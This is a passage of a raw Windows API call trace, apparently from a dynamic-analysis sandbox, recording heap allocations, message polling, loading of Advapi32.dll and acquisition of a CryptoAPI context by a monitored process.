wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0221.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0221.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0221.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0221.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0221.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0221.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0221.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0221.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0221.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0221.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0221.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0221.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0221.045] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0221.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0221.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0221.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0221.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0221.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0221.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0221.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0221.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0221.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0221.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0221.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0221.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0221.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0221.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0221.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0221.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0221.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0221.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0221.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0221.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0221.046] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0221.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0221.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0221.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0221.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0221.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0221.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0221.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0221.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0221.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0221.047] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0221.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0221.047] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043f0 [0221.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0221.047] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0221.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043f0 | out: hHeap=0x970000) returned 1 [0221.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0221.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0221.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0221.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0221.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0221.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0221.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0221.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0221.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0221.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0221.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0221.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0221.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0221.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0221.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0221.048] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0221.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0221.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0221.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0221.048] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0221.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0221.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0221.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0221.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0221.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0221.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0221.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0221.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0221.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0221.049] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0221.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0221.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0221.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0221.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0221.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0221.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0221.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0221.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0221.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0221.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0221.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0221.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0221.049] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0221.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0221.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0221.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0221.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0221.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0221.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0221.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0221.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0221.050] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0221.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0221.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0221.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0221.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0221.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0221.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0221.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0221.051] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.051] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0221.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0221.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0221.051] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0221.051] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0221.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e698c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0221.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0221.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0221.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0221.051] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0221.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0221.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0221.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0221.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0221.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0221.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0221.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0221.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b08 [0221.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0221.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0221.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0221.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0221.052] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0221.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0221.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0221.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0221.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0221.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0221.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0221.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0221.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0221.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0221.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0221.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0221.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0221.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0221.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0221.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0221.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0221.053] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0221.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0221.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0221.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0221.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0221.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0221.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0221.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0221.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0221.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0221.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0221.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0221.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0221.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0221.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0221.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0221.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0221.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0221.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0221.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0221.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0221.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0221.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0221.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0221.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0221.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0221.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0221.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0221.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0221.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0221.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0221.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0221.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0221.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0221.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0221.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0221.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0221.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0221.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0221.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0221.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0221.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0221.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0221.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0221.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0221.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0221.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0221.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0221.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0221.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0221.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0221.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0221.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0221.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0221.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0221.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0221.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0221.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0221.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0221.057] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0221.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0221.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0221.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0221.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0221.057] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0221.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0221.058] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0221.058] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0221.058] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.058] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 